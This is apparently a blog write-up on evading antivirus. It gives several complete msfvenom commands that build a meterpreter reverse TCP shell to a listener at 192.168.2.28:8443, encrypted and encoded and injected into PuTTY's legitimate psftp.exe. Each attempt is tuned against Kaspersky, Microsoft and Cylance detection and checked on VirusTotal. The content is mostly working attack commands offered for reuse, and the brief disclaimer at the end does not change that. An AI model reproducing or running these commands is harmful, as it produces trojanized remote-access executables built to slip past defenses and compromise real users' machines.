# Shellcoding - Modern AV Evasion

I'm unsure if it's just my luck, but I have noticed recently that my simple techniques of shellcoding with MSFVenom have been getting caught by anti-viruses.

**PoC**
https://www.virustotal.com/#/file-analysis/M2ZkYjljNTQ3NjYyYjM1M2YyMjNjMjhiYjA5ZWZjZTg6MTU1MDcxNzE5OA==

I wanted to do a quick write-up of the simple methods I use for simple evasion.

# Keep it Simple Stupid (KISS) Method

I always try to keep my shellcoding simple; custom shellcoding is always wonderful, but if you know your environment this will help a ton.

**Kali Toolkit**
Msfvenom - FUD exe

**Target Environment**
Windows 10 x64
*Kaspersky*
*UAC*
Up-to-date databases

psftp.exe
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

## Challenge: Simple Shellcode AV Evasion

Shellcode #1

Payload used:

```shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.2.28 LPORT=8443 --arch x64 --platform windows --encoder x64/xor_dynamic --encrypt-iv --encrypt xor --encrypt-key neoncat --iterations 20 --timeout 14 -x psftp.exe -f exe > neoncat.exe
```

**PoC**
https://www.virustotal.com/#/file/0790a58b9f9871abb470af7adc56b9f73adcc6276af984c538b949434ae3f389/

**Notes**
Major improvement, but two things concern me.

**Challenge**
1. ~~Kaspersky is bypassed~~
2. **Microsoft** detects the payload
3. Cylance detects the payload as well (I feel like they toot their horn too much about their anti-virus and AI detection).

## Attempt #2

Shellcode #2

```shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.2.28 LPORT=8443 --arch x64 --platform windows --encoder x64/xor --encrypt-iv --encrypt xor --encrypt-key neoncatkey --iterations 24 --timeout 18 -x psftp.exe -f exe > neoncat1.exe
```

- Changed encoder to **x64/xor**
- Encryption key changed to neoncatkey
- Iterations upped by four and timeout increased by four

**PoC**
https://www.virustotal.com/#/file/4310f8a8207b636fde35946966dd6d55e302e89031e07e7071d17b7b51c863fc/

**15/66** caught the EXE.
Now we know our entry point: **x64/xor_dynamic** will be our chosen encoder.

## Attempt #3

Payload:

```shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.2.28 LPORT=8443 --arch x64 --platform windows --encoder x64/xor_dynamic --encrypt-iv --encrypt rc4 --encrypt-key neoncatkeysignature --iterations 60 --timeout 10 -b '\x00' -n 22 -x psftp.exe -f exe > neoncat1.exe
```

~~Kaspersky Bypass~~
~~Microsoft Bypass~~
Cylance didn't scan the file, oddly.

Takeaway: cleaning up the code can help a bit, so the generic removal of one null byte and swapping the encryption method to RC4 has helped. Upping the encoding iterations and adding a NOP sled seemed to provide way better results.

**This payload would be the winner**

**PoC**
https://www.virustotal.com/#/file/cb413a14ce6b504c54df7a0b6b705ddc80001fc346b48ea667b81645d8a7c0c6

## Beating Cylance Challenge with MSFVENOM

This one was a fun one, but it took super long to encrypt. I added a very random NOP sled and added additional random null bytes.

Payload:

```shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.2.28 LPORT=8443 --arch x64 --platform windows --encoder x64/xor_dynamic --encrypt-iv --encrypt rc4 --encrypt-key neoncatkeysignaturekey --iterations 135 --timeout 30 -b '\x00\0a\0b' -n 240 -x psftp.exe -f exe > neoncatwinners.exe
```

**PoC**
https://www.virustotal.com/#/file/2a11bc26476ab122b5a97084cd129180a8445793d5d8e0f41c3dd11803aaad48

## Takeaways

Understand that encoding and encryption are your best friends, but you need to make custom shellcode and also tinker with the payload for your evasion to improve.

**Do not use this for illegal activity, you've been warned.
If you want to hack, I highly suggest checking out Hack the Box.**